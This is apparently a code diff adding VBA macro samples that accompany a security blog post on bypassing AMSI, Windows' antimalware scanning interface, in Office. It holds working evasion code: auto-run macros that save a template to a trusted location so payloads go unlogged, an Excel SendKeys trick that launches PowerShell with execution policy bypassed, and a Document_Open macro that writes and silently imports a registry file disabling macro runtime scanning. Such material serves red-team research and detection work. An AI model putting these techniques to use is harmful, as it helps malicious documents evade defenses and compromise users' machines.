|
| 1 | +'################################################################################## |
| 2 | +' Code samples for AMSI bypass techniques |
| 3 | +' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/ |
| 4 | +'################################################################################## |
| 5 | + |
| 6 | + |
| 7 | + |
| 8 | +' ################################################################################## |
| 9 | +' AMSI Bypass approach that abuses trusted locations (sample for Word) |
| 10 | +' ################################################################################## |
| 11 | +Subautoopen() |
| 12 | +'function called by the initial 'dropper' code, drops a dotm into %appdata\microsoft templates |
| 13 | + curfile = ActiveDocument.Path &"\" & ActiveDocument.Name |
| 14 | + templatefile = Environ("appdata") &"\Microsoft\Templates\" & DateDiff("s",#1/1/1970#, Now()) &".dotm" |
| 15 | + |
| 16 | + ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True |
| 17 | + |
| 18 | +' save back to orig location, otherwise AMSI will kcik in (as we are the template) |
| 19 | + ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled |
| 20 | + |
| 21 | +' now create a new file based on template |
| 22 | + Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0 |
| 23 | +End Sub |
| 24 | + |
| 25 | +Subautonew() |
| 26 | +' this function is called from a trusted location, not in the AMSI logs |
| 27 | + Shell"calc.exe" |
| 28 | +End Sub |
| 29 | + |
| 30 | + |
| 31 | +' ################################################################################## |
| 32 | +' AMSI Bypass approach that abuses Excel sendkeys to fireup the startmennu |
| 33 | +' ################################################################################## |
| 34 | +PrivateSubWorkbook_Open() |
| 35 | +On ErrorResume Next |
| 36 | + Application.SendKeys"^{esc}" |
| 37 | + Application.Wait (Now() + TimeValue("00:00:01")) |
| 38 | + Application.SendKeys"powershell.exe -ep bypass read-host ""malicious"" ~" |
| 39 | + |
| 40 | +End Sub |
| 41 | + |
| 42 | +' ################################################################################## |
| 43 | +' AMSI Bypass in Word that saves a reg and bat file to disable AMSI. |
| 44 | +' Adjust macro to 'saveas' in a startup or so |
| 45 | +' ################################################################################## |
| 46 | + |
| 47 | +Subdocument_open() |
| 48 | + filepath = ActiveDocument.Path &"\" |
| 49 | + |
| 50 | + |
| 51 | +' set contents and save as reg file |
| 52 | + Documents.Add |
| 53 | + ActiveDocument.Range.Text =_ |
| 54 | +"Windows Registry Editor Version 5.00" & vbNewLine & vbNewLine &_ |
| 55 | +"[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\security]" & vbNewLine &_ |
| 56 | +"""MacroRuntimeScanScope""=dword:00000000" & vbNewLine & vbNewLine |
| 57 | + |
| 58 | + ActiveDocument.SaveAs2 FileName:=filepath &"generatedByWord.reg", LineEnding:=wdCRLF, FileFormat:=wdFormatText, Encoding:=437 |
| 59 | + ActiveDocument.Close |
| 60 | + |
| 61 | +' set contents and save as bat file |
| 62 | + Documents.Add |
| 63 | + ActiveDocument.Range.Text ="regedit.exe /S generatedByWord.reg" |
| 64 | + |
| 65 | + ActiveDocument.SaveAs2 FileName:=filepath &"generatedByWord.bat", FileFormat:=wdFormatText, Encoding:=437, LineEnding:=wdCRLF |
| 66 | + ActiveDocument.Close |
| 67 | +End Sub |
| 68 | + |